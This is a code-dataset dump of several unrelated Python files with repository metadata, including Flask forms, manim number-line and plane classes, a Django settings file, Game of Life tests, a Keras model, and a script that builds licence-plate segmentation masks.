blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
44bce063b1374d7d942ea039e2798c82142d15a9 | 2353c62f951f0ff7791297f5019c184ded87fb41 | /mid.py | 59c4a0adacfcae4917d18efa922513efe410ed4f | [] | no_license | subham-dhakal/python-practice-files | 409aaf0e2649571ead7bcbe8dcce5120f4492de0 | 554bb34b0b96882bd19719f5f0876ad10f68934f | refs/heads/master | 2020-04-17T13:48:31.254326 | 2019-01-27T11:37:42 | 2019-01-27T11:37:42 | 166,618,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | from geometry import *
print(square(3)) | [
"subhamdhakal123@gmail.com"
] | subhamdhakal123@gmail.com |
5c39feec3f3cde848840efa165bb4fa1ed38e075 | 4bc5f6cc69448d54a7d0fd3be19317613999ceb3 | /authentication-with-flask-login/app/forms.py | 05908ee49f2e2d0610662672ff5bbe608e021d63 | [] | no_license | ThiaguinhoLS/flask-repo | 9aee2b6ff7bf9d61001ee3e3cbea1478caf108cd | 81e68c85ee8a1560a33bbaf78cbcb581c351ebb9 | refs/heads/master | 2020-04-26T16:24:32.721289 | 2019-03-12T06:26:27 | 2019-03-12T06:26:27 | 173,677,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | # -*- coding: utf-8 -*-
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, EqualTo
class RegisterForm(FlaskForm):
username = StringField("Username", validators=[DataRequired()])
password = PasswordField("Password", validators=[DataRequired()])
confirm_password = PasswordField(
"Confirm Password",
validators=[DataRequired(), EqualTo("password")]
)
submit = SubmitField("Register")
class LoginForm(FlaskForm):
username = StringField("Username", validators=[DataRequired()])
password = PasswordField("Password", validators=[DataRequired()])
submit = SubmitField("Login")
| [
"tthiaguinho638@gmail.com"
] | tthiaguinho638@gmail.com |
8d782db240350d90432dd02d4b520f1f21dd66a2 | 04e06f7c75338d7c617a303c7a477cbe3a437621 | /BlenderScripts/division_check.py | caceed6be2bec283a0088cbb49672b1ddcd4fd47 | [] | no_license | MonikaTworek/Crystal-Reign | 22e94d90f81694088de67cea31569f89078e0e8a | 785262f24e7b53f4e46438cb268c5e2cc164cf34 | refs/heads/master | 2022-04-11T11:27:12.211244 | 2020-03-03T16:15:20 | 2020-03-03T16:15:20 | 105,917,234 | 0 | 1 | null | 2017-12-14T20:37:52 | 2017-10-05T17:04:44 | C# | UTF-8 | Python | false | false | 1,293 | py | import bpy
import json
import os.path
main_directory = "D:/Blenderowe/Glass Ruin/"
hero_name = 'TheMan.000'
original_fbx = bpy.ops.import_scene.fbx( filepath = main_directory + "out/" + hero_name + "/fbx/" + hero_name + ".fbx" )
current_level = [hero_name]
current_level_nr = 1
ok = True
while ok:
children = []
for parent in current_level:
current_path = main_directory + "out/" + hero_name + "/json/" + parent + "_description.json"
if not os.path.isfile(current_path):
ok = False
else:
json_file = open( current_path )
current_json = json.load(json_file)
json_file.close()
current_fbx = bpy.ops.import_scene.fbx( filepath = main_directory + "out/" + hero_name + "/fbx/" + parent + "_chunks.fbx" )
for j in current_json["chunks"]:
children.append(j["name"])
o = bpy.context.scene.objects[j["name"]]
p = bpy.context.scene.objects[parent]
o.location.x = p.location.x - j["relative_position"]["x"]
o.location.y = p.location.y - j["relative_position"]["z"]
o.location.z = p.location.z + j["relative_position"]["y"] + 50
current_level = children
current_level_nr += 1 | [
"boberrs@gmail.com"
] | boberrs@gmail.com |
e75c50e8997df857883e1d460adb3d1088d20c7f | 18b5815ea72d96d2cf392ed3437b2e71ec4f48d7 | /game_of_life_test.py | bc01f4571b01e7102dc944d0bda9b3e881e63fdd | [] | no_license | dojobrasilia/game_of_life_python | 403c8bc7e9713f2d0c1aed1169254eb4b8b8bf59 | e650f787dff1fb1911517ab5bc990df0682cd371 | refs/heads/master | 2021-01-21T12:23:14.857164 | 2015-04-12T00:14:32 | 2015-04-12T00:14:32 | 33,867,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 903 | py | import unittest
from game_of_life import GameOfLife
class game_of_life_test(unittest.TestCase):
def test_we_have_a_game(self):
game = GameOfLife(2,1)
self.assertEquals(game.dimensions(), [2,1])
def test_the_simplest_game_is_only_a_dead_cell(self):
game = GameOfLife(1,1)
self.assertEquals(game.board," \n")
def test_the_simplest_game_is_only_a_dead_row(self):
game = GameOfLife(1,2)
self.assertEquals(game.board," \n")
def test_the_game_starts_with_a_complete_dead_board(self):
game = GameOfLife(2,2)
self.assertEquals(game.board," \n \n")
def test_the_simplest_game_is_only_a_live_cell(self):
game = GameOfLife(1,1)
game.setAlive(1,1);
self.assertEquals(game.board,"x\n")
def test_the_simplest_game_is_only_a_live_cell(self):
game = GameOfLife(2,2)
game.setAlive(1,1);
self.assertEquals(game.board,"x \n ") | [
"nuk.anime13@gmail.com"
] | nuk.anime13@gmail.com |
1a74ab5aad810b7dddfd9cd7bf07883124ee8c6a | 673495bacde94500eac381661e08690f6f9e4f82 | /blog/front/migrations/0005_auto_20200503_1912.py | 42f5041c170c9f278068fab698d2aff72cc8bcc4 | [] | no_license | stocke777/Blogsite-Django | 35b2e0e3ec469d55eba07b9b8b5c387d74ddc682 | c03a48458a175fc50f547a3f96a62e4657dd0151 | refs/heads/master | 2023-02-12T11:38:56.992600 | 2021-01-11T20:46:57 | 2021-01-11T20:46:57 | 269,267,543 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | # Generated by Django 2.2.5 on 2020-05-03 13:42
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('front', '0004_auto_20200503_1911'),
]
operations = [
migrations.RenameField(
model_name='post',
old_name='author',
new_name='author_id',
),
]
| [
"deshwaljaivardhan@gmail.com"
] | deshwaljaivardhan@gmail.com |
89c5b5ad7eff9c309c5857ac05d9e101834971dd | d9be34d92ec5bfec5756d5310c2e34226d726cb4 | /topics/number_line.py | 6f56af6f116629d093bcf1c05d295bd9366b7025 | [] | no_license | Oldpan/manim | 43119e4cf0b2d7c17affd66d1f64ce7a6c3bce81 | ac079f182a977bf0d830ab7647971b67cf9e5160 | refs/heads/master | 2021-07-20T11:23:45.752896 | 2017-10-27T22:12:29 | 2017-10-27T22:12:29 | 108,652,804 | 1 | 0 | null | 2017-10-28T13:47:39 | 2017-10-28T13:47:39 | null | UTF-8 | Python | false | false | 11,515 | py | from helpers import *
from mobject import Mobject1D
from mobject.vectorized_mobject import VMobject, VGroup
from mobject.tex_mobject import TexMobject
from topics.geometry import Line, Arrow
from scene import Scene
class NumberLine(VMobject):
CONFIG = {
"color" : BLUE,
"x_min" : -SPACE_WIDTH,
"x_max" : SPACE_WIDTH,
"unit_size" : 1,
"tick_size" : 0.1,
"tick_frequency" : 1,
"leftmost_tick" : None, #Defaults to ceil(x_min)
"numbers_with_elongated_ticks" : [0],
"numbers_to_show" : None,
"longer_tick_multiple" : 2,
"number_at_center" : 0,
"number_scale_val" : 0.75,
"line_to_number_vect" : DOWN,
"line_to_number_buff" : MED_SMALL_BUFF,
"include_tip" : False,
"propogate_style_to_family" : True,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
if self.leftmost_tick is None:
self.leftmost_tick = np.ceil(self.x_min)
VMobject.__init__(self, **kwargs)
if self.include_tip:
self.add_tip()
def generate_points(self):
self.main_line = Line(self.x_min*RIGHT, self.x_max*RIGHT)
self.tick_marks = VGroup()
self.add(self.main_line, self.tick_marks)
for x in self.get_tick_numbers():
self.add_tick(x, self.tick_size)
for x in self.numbers_with_elongated_ticks:
self.add_tick(x, self.longer_tick_multiple*self.tick_size)
self.stretch(self.unit_size, 0)
self.shift(-self.number_to_point(self.number_at_center))
def add_tick(self, x, size = None):
self.tick_marks.add(self.get_tick(x, size))
return self
def get_tick(self, x, size = None):
if size is None: size = self.tick_size
result = Line(size*DOWN, size*UP)
result.rotate(self.main_line.get_angle())
result.move_to(self.number_to_point(x))
return result
def get_tick_marks(self):
return self.tick_marks
def get_tick_numbers(self):
epsilon = 0.001
return np.arange(
self.leftmost_tick, self.x_max+epsilon,
self.tick_frequency
)
def number_to_point(self, number):
alpha = float(number-self.x_min)/(self.x_max - self.x_min)
return interpolate(
self.main_line.get_start(),
self.main_line.get_end(),
alpha
)
def point_to_number(self, point):
left_point, right_point = self.main_line.get_start_and_end()
full_vect = right_point-left_point
def distance_from_left(p):
return np.dot(p-left_point, full_vect)/np.linalg.norm(full_vect)
return interpolate(
self.x_min, self.x_max,
distance_from_left(point)/distance_from_left(right_point)
)
def default_numbers_to_display(self):
if self.numbers_to_show is not None:
return self.numbers_to_show
return np.arange(int(self.leftmost_tick), int(self.x_max)+1)
def get_number_mobjects(self, *numbers, **kwargs):
#TODO, handle decimals
if len(numbers) == 0:
numbers = self.default_numbers_to_display()
if "force_integers" in kwargs and kwargs["force_integers"]:
numbers = map(int, numbers)
result = VGroup()
for number in numbers:
mob = TexMobject(str(number))
mob.scale(self.number_scale_val)
mob.next_to(
self.number_to_point(number),
self.line_to_number_vect,
self.line_to_number_buff,
)
result.add(mob)
return result
def add_numbers(self, *numbers, **kwargs):
self.numbers = self.get_number_mobjects(
*numbers, **kwargs
)
self.add(*self.numbers)
return self
def add_tip(self):
start, end = self.main_line.get_start_and_end()
vect = (end - start)/np.linalg.norm(end-start)
arrow = Arrow(start, end + MED_SMALL_BUFF*vect, buff = 0)
tip = arrow.tip
tip.highlight(self.color)
self.tip = tip
self.add(tip)
class UnitInterval(NumberLine):
CONFIG = {
"x_min" : 0,
"x_max" : 1,
"unit_size" : 6,
"tick_frequency" : 0.1,
"numbers_with_elongated_ticks" : [0, 1],
"number_at_center" : 0.5,
}
class Axes(VGroup):
CONFIG = {
"propogate_style_to_family" : True,
"three_d" : False,
"number_line_config" : {
"color" : LIGHT_GREY,
"include_tip" : True,
},
"x_min" : -SPACE_WIDTH,
"x_max" : SPACE_WIDTH,
"y_min" : -SPACE_HEIGHT,
"y_max" : SPACE_HEIGHT,
"z_min" : -3.5,
"z_max" : 3.5,
"z_normal" : DOWN,
}
def __init__(self, **kwargs):
VGroup.__init__(self, **kwargs)
self.x_axis = NumberLine(
x_min = self.x_min,
x_max = self.x_max,
**self.number_line_config
)
self.y_axis = NumberLine(
x_min = self.y_min,
x_max = self.y_max,
**self.number_line_config
)
self.y_axis.rotate(np.pi/2)
self.add(self.x_axis, self.y_axis)
if self.three_d:
self.z_axis = NumberLine(
x_min = self.z_min,
x_max = self.z_max,
**self.number_line_config
)
self.z_axis.rotate(-np.pi/2, UP)
self.z_axis.rotate(angle_of_vector(self.z_normal), OUT)
self.add(self.z_axis)
class ThreeDAxes(Axes):
CONFIG = {
"x_min" : -5.5,
"x_max" : 5.5,
"y_min" : -4.5,
"y_max" : 4.5,
"three_d" : True,
}
class NumberPlane(VMobject):
CONFIG = {
"color" : BLUE_D,
"secondary_color" : BLUE_E,
"axes_color" : WHITE,
"secondary_stroke_width" : 1,
"x_radius": None,
"y_radius": None,
"x_unit_size" : 1,
"y_unit_size" : 1,
"center_point" : ORIGIN,
"x_line_frequency" : 1,
"y_line_frequency" : 1,
"secondary_line_ratio" : 1,
"written_coordinate_height" : 0.2,
"propogate_style_to_family" : False,
}
def generate_points(self):
if self.x_radius is None:
center_to_edge = (SPACE_WIDTH + abs(self.center_point[0]))
self.x_radius = center_to_edge / self.x_unit_size
if self.y_radius is None:
center_to_edge = (SPACE_HEIGHT + abs(self.center_point[1]))
self.y_radius = center_to_edge / self.y_unit_size
self.axes = VMobject()
self.main_lines = VMobject()
self.secondary_lines = VMobject()
tuples = [
(
self.x_radius,
self.x_line_frequency,
self.y_radius*DOWN,
self.y_radius*UP,
RIGHT
),
(
self.y_radius,
self.y_line_frequency,
self.x_radius*LEFT,
self.x_radius*RIGHT,
UP,
),
]
for radius, freq, start, end, unit in tuples:
main_range = np.arange(0, radius, freq)
step = freq/float(freq + self.secondary_line_ratio)
for v in np.arange(0, radius, step):
line1 = Line(start+v*unit, end+v*unit)
line2 = Line(start-v*unit, end-v*unit)
if v == 0:
self.axes.add(line1)
elif v in main_range:
self.main_lines.add(line1, line2)
else:
self.secondary_lines.add(line1, line2)
self.add(self.secondary_lines, self.main_lines, self.axes)
self.stretch(self.x_unit_size, 0)
self.stretch(self.y_unit_size, 1)
self.shift(self.center_point)
#Put x_axis before y_axis
y_axis, x_axis = self.axes.split()
self.axes = VMobject(x_axis, y_axis)
def init_colors(self):
VMobject.init_colors(self)
self.axes.set_stroke(self.axes_color, self.stroke_width)
self.main_lines.set_stroke(self.color, self.stroke_width)
self.secondary_lines.set_stroke(
self.secondary_color, self.secondary_stroke_width
)
return self
def get_center_point(self):
return self.coords_to_point(0, 0)
def coords_to_point(self, x, y):
x, y = np.array([x, y])
result = self.axes.get_center()
result += x*self.get_x_unit_size()*RIGHT
result += y*self.get_y_unit_size()*UP
return result
def point_to_coords(self, point):
new_point = point - self.axes.get_center()
x = new_point[0]/self.get_x_unit_size()
y = new_point[1]/self.get_y_unit_size()
return x, y
def get_x_unit_size(self):
return self.axes.get_width() / (2.0*self.x_radius)
def get_y_unit_size(self):
return self.axes.get_height() / (2.0*self.y_radius)
def get_coordinate_labels(self, x_vals = None, y_vals = None):
coordinate_labels = VGroup()
if x_vals == None:
x_vals = range(-int(self.x_radius), int(self.x_radius)+1)
if y_vals == None:
y_vals = range(-int(self.y_radius), int(self.y_radius)+1)
for index, vals in enumerate([x_vals, y_vals]):
num_pair = [0, 0]
for val in vals:
if val == 0:
continue
num_pair[index] = val
point = self.coords_to_point(*num_pair)
num = TexMobject(str(val))
num.add_background_rectangle()
num.scale_to_fit_height(
self.written_coordinate_height
)
num.next_to(point, DOWN+LEFT, buff = SMALL_BUFF)
coordinate_labels.add(num)
self.coordinate_labels = coordinate_labels
return coordinate_labels
def get_axes(self):
return self.axes
def get_axis_labels(self, x_label = "x", y_label = "y"):
x_axis, y_axis = self.get_axes().split()
quads = [
(x_axis, x_label, UP, RIGHT),
(y_axis, y_label, RIGHT, UP),
]
labels = VGroup()
for axis, tex, vect, edge in quads:
label = TexMobject(tex)
label.add_background_rectangle()
label.next_to(axis, vect)
label.to_edge(edge)
labels.add(label)
self.axis_labels = labels
return labels
def add_coordinates(self, x_vals = None, y_vals = None):
self.add(*self.get_coordinate_labels(x_vals, y_vals))
return self
def get_vector(self, coords, **kwargs):
point = coords[0]*RIGHT + coords[1]*UP
arrow = Arrow(ORIGIN, coords, **kwargs)
return arrow
def prepare_for_nonlinear_transform(self, num_inserted_anchor_points = 50):
for mob in self.family_members_with_points():
num_anchors = mob.get_num_anchor_points()
if num_inserted_anchor_points > num_anchors:
mob.insert_n_anchor_points(num_inserted_anchor_points-num_anchors)
mob.make_smooth()
return self
def apply_function(self, function, maintain_smoothness = True):
VMobject.apply_function(self, function, maintain_smoothness = maintain_smoothness)
| [
"grantsanderson7@gmail.com"
] | grantsanderson7@gmail.com |
6111abe50049d76f27a91b29d38303902006c54b | 3d0203ee55e6ea577b9b6f70c2a695b305017757 | /src/strategies/stochastic/stochastic_version5.py | be45f765bdc8edfdc7b71cdfae14eef8cbf24c29 | [] | no_license | pedro3110/exchange-simulator | 223da9b6d2323380b0dac5d78f7aa8d4b5ea0342 | 348bffad330df8067ef228981d56386e6a40a0d8 | refs/heads/master | 2022-04-20T12:42:00.324548 | 2020-04-20T14:25:11 | 2020-04-20T14:25:11 | 257,305,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,268 | py | import numpy as np
from src.strategies.strategy import Strategy
from src.exchange.orders.order_creator import OrderCreator
from src.exchange.messages.for_orderbook import MessageForOrderbook
from src.exchange.messages.for_agent import MessageForAgent
from src.exchange.notifications.ob_notification import OBNotification
from src.exchange.notifications.order_status_notification import OrderStatusNotification
from src.utils.debug import Debug
class StochasticStrategy5(Strategy, Debug):
def __init__(self, agent, identifier, wakeup_distribution, cancellation_timeout,
direction, price_distribution, size_distribution,
contract, exec_type, end_time):
super(StochasticStrategy5, self).__init__(agent)
self.identifier = identifier
self.end_time = end_time
self.cancellation_timeout = cancellation_timeout
self.wakeup_distribution = lambda: np.round(wakeup_distribution(), 2)
self.price_distribution = price_distribution
self.size_distribution = size_distribution
self.next_wakeup_time = self.wakeup_distribution()
self.debug("Initialize next_wakeup_time = %f" % self.next_wakeup_time)
self.time_advance = self.next_wakeup_time
self.orders_sent = [] # order_id of each order sent
self.cancellation_time_for_orders = [] # heap[(cancellation_time, order_id)]
self.next_order = None
self.direction = direction
self.contract = contract
self.exec_type = exec_type
def get_price(self, t):
new_price = np.round(self.price_distribution(t)(), 2)
self.debug("Price = %f" % new_price)
return new_price
def get_size(self, t):
new_size = np.round(self.size_distribution(t)(), 2)
self.debug("Size = %f" % new_size)
return new_size
def output_function(self, current_time, elapsed):
output = {}
for output_port in self.get_devs_model().output_ports:
if output_port == 'out_order':
send, order = self.get_next_order(current_time, elapsed)
if send is True:
self.debug('Send order %i' % order.m_orderId)
self.debug("%f %f" % (current_time, elapsed))
output[output_port] = MessageForOrderbook(agent=self.get_devs_model().identifier,
time_sent=current_time + elapsed,
value=order)
self.next_order = None
else:
raise Exception()
return output
def get_next_order(self, current_time, elapsed):
if self.next_order is None:
return False, None
else:
return True, self.next_order
def process_in_next(self, current_time, elapsed, message):
self.debug("process_in_next")
if current_time + elapsed >= self.end_time or current_time + elapsed > self.next_wakeup_time:
return float('inf')
return self.next_wakeup_time - current_time - elapsed
def update_order_notification(self, notification):
self.debug("update_order_notification")
super(StochasticStrategy5, self).update_strategy_orders_status(notification)
self.debug(str(notification.completed))
#
self.debug(str(self.get_completed()))
self.debug(str(self.get_partial_completed()))
self.debug(str(self.get_accepted()))
return None
def process_in_notify_order(self, current_time, elapsed, message):
self.debug("process_in_notify_order")
if current_time + elapsed >= self.end_time or current_time + elapsed > self.next_wakeup_time:
return float('inf')
assert (isinstance(message.value, OrderStatusNotification))
if isinstance(message, MessageForAgent):
notification = message.value
assert (isinstance(notification, OBNotification))
self.update_order_notification(notification)
return self.next_wakeup_time - current_time - elapsed
def process_internal(self, current_time, elapsed):
self.debug("process_internal")
# TODO: standarize this to all transitions (internal and external)
if current_time + elapsed >= self.end_time or current_time + elapsed > self.next_wakeup_time:
return float('inf')
size = self.get_size(current_time + elapsed)
price = self.get_price(current_time + elapsed)
# Propose wakeup time. If there is a cancellation before, first cancel and then propose again
next_order_wakeup_time = current_time + elapsed + self.wakeup_distribution()
self.debug('setea next wakeup = %f' % next_order_wakeup_time)
self.debug("%f %f" % (current_time, elapsed))
# TODO: consider cancellations
# if len(self.can)
# next_cancellation_wakeup = heapq.nsmallest(1, )
# Get next wakeup time
# Finish
if next_order_wakeup_time > self.end_time:
# self.debug("YYY %f" % self.next_wakeup_time)
# self.next_wakeup_time = float('inf')
# return float('inf')
return float('inf')
else:
self.next_wakeup_time = next_order_wakeup_time
self.debug("Wakeup (1) = %f, current=%f, elapsed=%f" % (self.next_wakeup_time, current_time, elapsed))
next_id = np.random.randint(0, 1000)
self.debug("Creating order %i at t=%f" % (next_id, current_time + elapsed))
self.next_order = OrderCreator.create_order_from_dict({
'contract': self.contract, 'creator_id': self.identifier,
'order_id': next_id,
'price': price, 'size': size,
'direction': self.direction, 'exec_type': self.exec_type,
'creation_time': current_time,
# Option 1: set expiration time for automatic cancellations
'expiration_time': current_time + elapsed + self.cancellation_timeout
})
# Important
self.orders_sent.append(self.next_order.m_orderId)
return self.next_wakeup_time - current_time - elapsed
| [
"admin@aristas.com.ar"
] | admin@aristas.com.ar |
b5c1e255f61cb1b8c2f50c689b2c6e87930cd3c5 | 60ea696a8bd25b903119cf595c3ee5c866b08e90 | /tfgproject/settings.py | 35ff5f6a72c27d167a4404135f25dbe1ec6edd2f | [] | no_license | adrianvinuelas/tfgproject | 4ed46bcc68d828c8697c3f295dda7fcd4d15782e | e8948a7e42e67fd0c76da7776c007d0ea44382db | refs/heads/master | 2020-04-03T01:05:06.392719 | 2016-05-28T09:21:53 | 2016-05-28T09:21:53 | 59,886,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,223 | py | """
Django settings for tfgproject project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'yi&ezmr(6bx#2bfmpu)d%d+5i^x1@2wp0b=keowfi00ppr(7hm'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'checkexercises.apps.CheckexercisesConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tfgproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tfgproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/' | [
"adrian.vinuelas@gmail.com"
] | adrian.vinuelas@gmail.com |
618cc4a68ba95a5b382440b1c3c9f28c667ada75 | 7b11ff19dd57d91016817d2a25969f55a199d763 | /contest02/scripts/create-segmentation-dataset.py | 0c1feabe8d1624b2edeccb920524c7d357fc0d84 | [] | no_license | LuckyAndre/CV_face_key_points_detection | eb5d61c8bfab353480342b9933cda898cde10157 | 09cffc2cc7dd320e3754284813c6b9687f55e525 | refs/heads/master | 2023-07-21T06:23:24.007608 | 2021-09-04T04:54:35 | 2021-09-04T04:54:35 | 365,687,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,820 | py | """
train.json содержит названия файла и метки (4 точки) ГРЗ.
На одном фото может быть несколько ГРЗ.
Данная процедура создает маску по размерам фото и наносит на маску области, занимаемые ГРЗ. Маска сохраняется в отдельном файле.
Также формируется конфиг файл вида: {"file": "file_name.ext", "mask": "file_name.mask.ext"}
"""
import json
import os
from argparse import ArgumentParser
import cv2
import numpy as np
import tqdm
# ПРОВЕРИЛ
def parse_arguments():
parser = ArgumentParser()
parser.add_argument("--data-dir", help="Path to dir containing 'train/', 'test/', 'train.json'.")
return parser.parse_args()
# ПРОВЕРИЛ
def main(args):
config_filename = os.path.join(args.data_dir, "train.json")
with open(config_filename, "rt") as fp:
config = json.load(fp)
config_segmentation = []
for item in tqdm.tqdm(config):
new_item = {}
new_item["file"] = item["file"]
image_filename = item["file"]
image_base, ext = os.path.splitext(image_filename)
mask_filename = image_base + ".mask" + ext
nums = item["nums"] # список вида [{'box': [[794, 661], [1004, 618], [1009, 670], [799, 717]], 'text': 'M938OX116'}, {'box': [[944, 268], [995, 267], [994, 283], [942, 283]], 'text': 'H881OA116'}]
# проверка, что файл не существует
if os.path.exists(os.path.join(args.data_dir, mask_filename)):
raise FileExistsError(os.path.join(args.data_dir, mask_filename))
# считываю данные
image = cv2.imread(os.path.join(args.data_dir, image_filename))
if image is None:
continue
# создаю маску из нулей по размерам изображения
mask = np.zeros(shape=image.shape[:2], dtype=np.uint8)
for num in nums: # для каждого ГРЗ на фото:
bbox = np.asarray(num["box"])
cv2.fillConvexPoly(mask, bbox, 255) # наносим на маску область, занимаемую ГРЗ
cv2.imwrite(os.path.join(args.data_dir, mask_filename), mask) # сохраняю маску
new_item["mask"] = mask_filename
config_segmentation.append(new_item) # сохраняю данные в конфиг [{"file": "file_name.ext", "mask": "file_name.mask.ext"}, {} ...]
output_config_filename = os.path.join(args.data_dir, "train_segmentation.json")
with open(output_config_filename, "wt") as fp:
json.dump(config_segmentation, fp)
if __name__ == "__main__":
main(parse_arguments())
| [
"312region@gmail.com"
] | 312region@gmail.com |
039a39b1067354229692a9c0b4cb06db83a5aef8 | 2eb1239028b489b27820e9629cd44a10fa31bdc8 | /models/128x256x512x256x128_dp_0_5.py | 202530e4ccf1559e6f69a47b4d9e3c92cc074594 | [] | no_license | jofas/wpfvs | 323aa1a44a0bac3a1f3b5ea55bf14a12373febd5 | 4a60e536f199ae8d34ed67fdec29c5468fbe91b6 | refs/heads/master | 2020-03-15T12:52:49.884319 | 2018-08-02T18:17:37 | 2018-08-02T18:17:37 | 132,153,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | def model(input_size, output_size):
from keras.models import Sequential
from keras.layers import Dense, Dropout
model = Sequential([
Dense(128, activation='relu',input_dim=input_size),
Dropout(0.5),
Dense(256,activation='relu'),
Dropout(0.5),
Dense(512,activation='relu'),
Dropout(0.5),
Dense(512,activation='relu'),
Dropout(0.5),
Dense(256,activation='relu'),
Dropout(0.5),
Dense(128,activation='relu'),
Dropout(0.5),
Dense(output_size,activation='softmax'),
])
return compile(model)
def compile(model):
# meta we need for training
model.compile(
optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy']
)
return model
| [
"jonas@fc-web.de"
] | jonas@fc-web.de |
052f1a2217fdddc546c9ce567b49ff98d627cea8 | d410c2fcb23e332a93e23119c8c9be7cc4d4986d | /.ycm_extra_conf.py | 85ff970dd227fc0cd30615cdcf2df2da3943fbc4 | [
"MIT"
] | permissive | lnicola/auracle | 1781a287d8dd3edf33b2a488ff7e82ae63e70996 | aa6f9fd13c76c533d138028a1ebea669005e7e1e | refs/heads/master | 2020-04-23T07:26:16.521766 | 2019-02-11T02:08:22 | 2019-02-11T02:08:22 | 171,005,784 | 1 | 0 | MIT | 2019-02-16T13:17:15 | 2019-02-16T13:17:14 | null | UTF-8 | Python | false | false | 4,675 | py | # Copyright (C) 2014 Google Inc.
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++1z',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
'-isystem',
'/usr/include',
'-isystem',
'/usr/local/include',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# Most projects will NOT need to set this to anything; you can just change the
